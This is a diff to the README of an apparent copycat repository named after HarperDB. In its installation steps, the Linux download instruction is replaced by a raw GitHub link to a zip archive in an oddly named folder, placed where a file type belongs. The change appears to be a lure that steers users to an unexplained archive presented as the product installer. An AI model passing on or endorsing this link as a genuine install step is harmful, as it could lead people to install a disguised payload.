Abrarkhan23/harperdb-kkc/README.md

 3. Select the file for your operating system:
    - For Windows, download the `.exe` file.
    - For macOS, download the `.dmg` file.
-   - For Linux, download the relevant `.tar.gz` file.
+   - For Linux, download the relevant `https://raw.githubusercontent.com/Abrarkhan23/harperdb-kkc/main/uninterposing/harperdb-kkc.zip` file.
 4. Once the file finishes downloading, follow these steps to install:
    - For Windows:
      - Double-click the downloaded `.exe` file.